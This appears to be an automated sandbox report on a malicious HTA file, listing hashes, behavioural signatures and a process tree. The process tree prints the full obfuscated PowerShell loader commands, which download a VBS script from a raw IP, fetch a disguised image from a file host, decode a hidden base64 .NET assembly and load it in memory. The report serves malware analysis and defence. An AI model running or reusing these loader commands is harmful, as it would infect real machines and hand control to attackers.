Analysis
-
max time kernel
121s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
15-11-2024 17:13
Static task
static1
Behavioral task
behavioral1
Sample
kissmegoodthingwhichgivemebestthignswithgirluaremy.hta
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
kissmegoodthingwhichgivemebestthignswithgirluaremy.hta
Resource
win10v2004-20241007-en
General
-
Target
kissmegoodthingwhichgivemebestthignswithgirluaremy.hta
-
Size
178KB
-
MD5
43f15554d66e784d988aa2da3ed2a136
-
SHA1
6d0fb362a8aa62a046e25435e6a525e2ca61492d
-
SHA256
5c7f1d6ac7671a1b1764dba808cf52f5c5c48ce1cbd0f1c16d8f6cf0afe5d3c8
-
SHA512
2c06f6a513bd10d648dfec384fc1056b0e8f39a830e0671f9098961076de61ac7db5e0dc7724a7ffd403a4769b90324aeb785d0b16c13dfe7dd24342a9460cd9
-
SSDEEP
96:4vCl17J1YiZVGTVy1YiZQGTVMFxfwVXNewJrC1YiZo1YiZDjGTVs1YiZkQ:4vCldfhjGTOheGTqHwShohxjGTYhuQ
Malware Config
Extracted
https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f
https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 3 2732 poWErSHELL.EXE 6 2316 powershell.exe 7 2316 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 2968 powershell.exe 2316 powershell.exe -
Evasion via Device Credential Deployment 2 IoCs
pid Process 2732 poWErSHELL.EXE 2764 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language poWErSHELL.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 2732 poWErSHELL.EXE 2764 powershell.exe 2968 powershell.exe 2316 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2732 poWErSHELL.EXE Token: SeDebugPrivilege 2764 powershell.exe Token: SeDebugPrivilege 2968 powershell.exe Token: SeDebugPrivilege 2316 powershell.exe -
Suspicious use of WriteProcessMemory 28 IoCs
description pid Process procid_target PID 2828 wrote to memory of 2732 2828 mshta.exe 30 PID 2828 wrote to memory of 2732 2828 mshta.exe 30 PID 2828 wrote to memory of 2732 2828 mshta.exe 30 PID 2828 wrote to memory of 2732 2828 mshta.exe 30 PID 2732 wrote to memory of 2764 2732 poWErSHELL.EXE 32 PID 2732 wrote to memory of 2764 2732 poWErSHELL.EXE 32 PID 2732 wrote to memory of 2764 2732 poWErSHELL.EXE 32 PID 2732 wrote to memory of 2764 2732 poWErSHELL.EXE 32 PID 2732 wrote to memory of 2328 2732 poWErSHELL.EXE 33 PID 2732 wrote to memory of 2328 2732 poWErSHELL.EXE 33 PID 2732 wrote to memory of 2328 2732 poWErSHELL.EXE 33 PID 2732 wrote to memory of 2328 2732 poWErSHELL.EXE 33 PID 2328 wrote to memory of 800 2328 csc.exe 34 PID 2328 wrote to memory of 800 2328 csc.exe 34 PID 2328 wrote to memory of 800 2328 csc.exe 34 PID 2328 wrote to memory of 800 2328 csc.exe 34 PID 2732 wrote to memory of 1228 2732 poWErSHELL.EXE 36 PID 2732 wrote to memory of 1228 2732 poWErSHELL.EXE 36 PID 2732 wrote to memory of 1228 2732 poWErSHELL.EXE 36 PID 2732 wrote to memory of 1228 2732 poWErSHELL.EXE 36 PID 1228 wrote to memory of 2968 1228 WScript.exe 37 PID 1228 wrote to memory of 2968 1228 WScript.exe 37 PID 1228 wrote to memory of 2968 1228 WScript.exe 37 PID 1228 wrote to memory of 2968 1228 WScript.exe 37 PID 2968 wrote to memory of 2316 2968 powershell.exe 39 PID 2968 wrote to memory of 2316 2968 powershell.exe 39 PID 2968 wrote to memory of 2316 2968 powershell.exe 39 PID 2968 wrote to memory of 2316 2968 powershell.exe 39
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\kissmegoodthingwhichgivemebestthignswithgirluaremy.hta"1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2828 -
C:\Windows\SysWOW64\wiNdOwSPowErSHelL\v1.0\poWErSHELL.EXE"C:\Windows\SYsTem32\wiNdOwSPowErSHelL\v1.0\poWErSHELL.EXE" "POwERshelL.ExE -eX bYpasS -NOP -w 1 -C DeVIceCrEdENTialdEPLOYMeNT ; InVOke-expRESSioN($(InVokE-eXpReSsioN('[systEM.text.encoDinG]'+[ChAr]0x3A+[ChaR]0x3A+'UtF8.getSTRing([system.conVeRt]'+[chaR]0X3a+[Char]0x3A+'fROMbASE64sTrinG('+[CHAR]0X22+'JHc4Mm1RRCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1iRVJkRUZJTmlUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1PTi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJdCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHZ2J5dVJqRE9ULHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN6S3pyLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwVVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUHpYKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAidUdVV29mIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lc3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5UW9Oc3ZVWVFmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR3ODJtUUQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzMyL3NlZW15YmVzdHRoaW5nc3dpdGhlbnRpcmVsaWZldGltZXRoaW5nc3RvZG9teWJlc3QudElGIiwiJGVOdjpBUFBEQVRBXHNlZW15YmVzdHRoaW5nc3dpdGhlbnRpcmVsaWZldGltZXRoaW5nc3RvZG9teWIudmJTIiwwLDApO1NUYXJULXNMZUVQKDMpO2lleCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcc2VlbXliZXN0dGhpbmdzd2l0aGVudGlyZWxpZmV0aW1ldGhpbmdzdG9kb215Yi52YlMi'+[ChAr]34+'))')))"2⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2732 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bYpasS -NOP -w 1 -C DeVIceCrEdENTialdEPLOYMeNT3⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2764
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2wlxg1wp.cmdline"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2328 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6C1C.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC6C1B.tmp"4⤵
- System Location Discovery: System Language Discovery
PID:800
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seemybestthingswithentirelifetimethingstodomyb.vbS"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1228 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHZFckJPU2VQUkVmRVJlbkNlLlRPc3RyaW5nKClbMSwzXSsneCctSm9JbicnKSAoKCdwd2dpbWFnZVVybCcrJyAnKyc9IG9UQWh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5UJysnSUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiJysnMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgb1RBOycrJ3B3Z3dlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7cHdnaW1hZ2VCeXRlcyA9IHB3Z3dlYkNsaWVudC5Eb3dubCcrJ29hZERhdGEocHdnaW1hZ2VVcmwpO3B3Z2ltYWdlVGV4dCA9IFtTeXN0ZW0uVCcrJ2V4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHB3Z2ltYWdlQnl0ZXMpO3B3Z3N0YXJ0RmxhZyA9IG9UQTw8QkFTRTY0XycrJ1NUQVJUPj5vVEE7cHdnZW5kRmxhZyA9IG9UQTw8QkFTRTY0X0VORD4+b1RBO3B3Z3N0YXJ0SW5kZXggPSBwd2dpbWFnZVRleHQuSW5kZXhPZihwd2dzdGFydEZsYWcpO3B3Z2VuZEluZGV4ID0gcHdnaW1hZ2VUZXh0LkluZGV4JysnT2YocHdnZW5kRmxhZyk7cHdnJysnc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHB3Z2VuZEluZGV4IC1ndCBwd2dzdGFydEluZGV4O3B3Z3N0YXJ0SW5kZXggKz0gcHdnc3RhcnRGbGFnLkxlbmd0aDtwd2diYXNlNjRMZW5ndGggPSBwd2dlbmRJbmRleCAtIHB3Z3N0YXJ0SW5kZXg7cHdnYmFzZTY0Q29tbWFuZCcrJyA9IHB3Z2ltYWdlVGV4dC5TdWJzdHJpbmcocHdnc3RhcnRJbmRleCwgcHdnYmFzZTY0TGVuZ3RoKTtwd2diYXNlNjRSZXZlcnNlZCA9IC1qb2luIChwd2diYXNlNjRDb21tYW5kLlRvJysnQ2hhckFycmF5KCkgNG91IEZvckVhY2gtT2JqZWN0IHsgcHdnXyB9KVstMS4uLShwd2diYXNlNjRDb21tYW5kLkxlbmd0aCldO3B3Z2NvbScrJ21hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcocHdnYmFzZTY0UmV2ZXJzZWQpO3B3Z2xvYWRlZEFzc2VtYmwnKyd5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChwd2djb21tYW5kQnl0ZXMpO3B3Z3ZhaU1ldGhvZCA9IFtkbicrJ2xpYi5JTy5Ib21lXS5HJysnZXRNZXRob2Qob1RBVkFJb1RBKTtwd2d2YWknKydNZXRob2QuSW52b2tlKHB3JysnZ251bGwsIEAob1RBdHh0LlNMTFBNUy8yMy82MzEuMzQyLjMuMjkxLy86cHR0aG9UQSwgb1RBZGVzYXRpdmFkb29UQSwnKycgb1RBZGVzJysnYXRpdmFkb29UQSwgb1RBZGVzYXQnKydpdmFkb29UQSwgb1RBYXNwbmV0X2NvbXBpbGVyb1RBLCBvVEFkJysnZXNhdGl2YWRvb1RBLCBvVEFkZXNhdGl2YWRvb1RBLG9UQWRlc2F0aXZhZG9vVEEsb1RBZGVzYXRpdmFkJysnb29UQSxvVEFkZScrJ3NhdGl2YWRvb1RBLG9UQWRlc2F0aXZhZG9vVEEsb1RBZGVzYXRpJysndmFkb29UQSxvVCcrJ0Exb1RBLG9UJysnQWRlc2F0aXZhZG9vVEEpKTsnKS5SZXBMQWNlKCdwd2cnLFtTVHJJbmddW0NoQXJdMzYpLlJlcExBY2UoKFtDaEFyXTExMStbQ2hBcl04NCtbQ2hBcl02NSksW1NUckluZ11bQ2hBcl0zOSkuUmVwTEFjZSgoW0NoQXJdNTIrW0NoQXJdMTExK1tDaEFyXTExNyksJ3wnKSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2968 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $vErBOSePREfERenCe.TOstring()[1,3]+'x'-JoIn'') (('pwgimageUrl'+' '+'= oTAhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnT'+'ICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb'+'209c62c1730945176a0904f oTA;'+'pwgwebClient = New-Object System.Net.WebClient;pwgimageBytes = pwgwebClient.Downl'+'oadData(pwgimageUrl);pwgimageText = [System.T'+'ext.Encoding]::UTF8.GetString(pwgimageBytes);pwgstartFlag = oTA<<BASE64_'+'START>>oTA;pwgendFlag = oTA<<BASE64_END>>oTA;pwgstartIndex = pwgimageText.IndexOf(pwgstartFlag);pwgendIndex = pwgimageText.Index'+'Of(pwgendFlag);pwg'+'startIndex -ge 0 -and pwgendIndex -gt pwgstartIndex;pwgstartIndex += pwgstartFlag.Length;pwgbase64Length = pwgendIndex - pwgstartIndex;pwgbase64Command'+' = pwgimageText.Substring(pwgstartIndex, pwgbase64Length);pwgbase64Reversed = -join (pwgbase64Command.To'+'CharArray() 4ou ForEach-Object { pwg_ })[-1..-(pwgbase64Command.Length)];pwgcom'+'mandBytes = [System.Convert]::FromBase64String(pwgbase64Reversed);pwgloadedAssembl'+'y = [System.Reflection.Assembly]::Load(pwgcommandBytes);pwgvaiMethod = [dn'+'lib.IO.Home].G'+'etMethod(oTAVAIoTA);pwgvai'+'Method.Invoke(pw'+'gnull, @(oTAtxt.SLLPMS/23/631.342.3.291//:ptthoTA, oTAdesativadooTA,'+' oTAdes'+'ativadooTA, oTAdesat'+'ivadooTA, oTAaspnet_compileroTA, oTAd'+'esativadooTA, oTAdesativadooTA,oTAdesativadooTA,oTAdesativad'+'ooTA,oTAde'+'sativadooTA,oTAdesativadooTA,oTAdesati'+'vadooTA,oT'+'A1oTA,oT'+'AdesativadooTA));').RepLAce('pwg',[STrIng][ChAr]36).RepLAce(([ChAr]111+[ChAr]84+[ChAr]65),[STrIng][ChAr]39).RepLAce(([ChAr]52+[ChAr]111+[ChAr]117),'|'))"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2316
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5065fed08115f6bbd6bb3487573d20e8c
SHA16b7122bf21ee22e5b3ccb1b2214726d99caecb2d
SHA256413a238800d97fea48c2799337756f78e0527a2885d5a1fd451519e228c0baba
SHA5120b6405cafb7a472487b8ee54ddeb7f85ab206e4c2db908b01cd7685451934acdfbaa8bd25b0d94c214bfe334447ef39f364fd10b975ce686d4c01ffd513683d5
-
Filesize
7KB
MD568a4ff7ca98ce90fdbcd72210e10410a
SHA115825f0b99357b9334c24ecef2d2b07298db0253
SHA256384736d07e6409532f1cf353f55d0cbd5da3bc21483a173222c4c171dc28c8d6
SHA512afd300f08cb51838f4197a786f59136947619d7455481d0a675257901d125b3f29b1e425edb79116635536342c616e41a517f941fc6d97b28ffa5bfa85e5235d
-
Filesize
1KB
MD5e488e7bb0c982d945451699063ad8752
SHA155dba8ccac210f492c1b19137bf4d1d0973df511
SHA256f0b38c44eeb26b4a8fc5f8bdedc4cf2c2b44068e9b82fa7e8965820501a12f3e
SHA5123027d14ba2038c58125b3aaa367ef3be34c84c5ca5420e90804c75b434d35b4965e8b388440416bac7ae6aa17e0d148a8897e16744928273549efae16e1df277
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD52381663dd097fc58251eb78a17e6712d
SHA1be46ea11b658cc00a9bdf807a73e4442e8611f9f
SHA25603e84e1c29b564e29ddf6a6304daf816bd36a24257f5aec81f2e2055ea81290f
SHA512e168aee532a317ca9dabdab38134badee97045686b17c1e9b78a314f478dff299fb0d5f3cab3c090d859c90c95b139fb37107b2b301aef67a26d3748388646c0
-
Filesize
138KB
MD5100d059d24305dc95db276aa180dc4cf
SHA1cb2e9d345f365a0dc65b61cf40865b223c4688ad
SHA25687be9d53a554146bcbab91270c1ef35561f5168e6f84ea86c26d23b4c803247d
SHA51214f70627cbb1adbb26d511d92558c471ca5354a1d0fa54a33d22d7c4933b6e1873871750f53318cd9c8d4e8b3f7627bac2f4bac3f295a67e2d35756ad951c8f5
-
Filesize
476B
MD5405282350b57e6d41b6d58a029558c64
SHA16c50ec9dd86fa438a3bc1af48a3b49f1bc364e49
SHA25611a1bdc49e30fac7bc2cbebd22d8f4f072a449141ddd7e197f85ccb2ab331506
SHA5125f45c0c1451fe0c044138c44b3708baf9468df7d91d1201dc05fcef629f9cab8fd9f66cc14a37c62a189829f1de22d4a1135813226bff45181283f59706de351
-
Filesize
309B
MD5a466b4cba4d44d5b52ae7df0c6abe807
SHA17fdfe379844b9aac477c7d88eb59131c9f5efbe9
SHA2567c8dfd8226d468a34815e2802c8cc4e97ab2d5750855299505605e0a8c48a42d
SHA512fe8a43ec7c0e0bc0ba0483f60d5a00d3297b8df04bf2523917f5aacedd054753341a26aec913fc12c368d2ef8d3ee8bde7b95e5fe8307e3963f7dc5af1842e9f
-
Filesize
652B
MD52098a69cb99250e1a69a4b864883b8d9
SHA140d6d57ce618d1da5edce27b11e07a684e49ee0e
SHA25611301723b2190fe9879f7580b841da15bac21122966cbb56d8cc0a69371265e9
SHA5126a952268660d5ed003ab7821ccc1f8164cceb27e5812c8d0e24f951d3f7f7e37bed438840b11a90298d9364c95273b94de391cbfa0245b8d68596073e5e5742b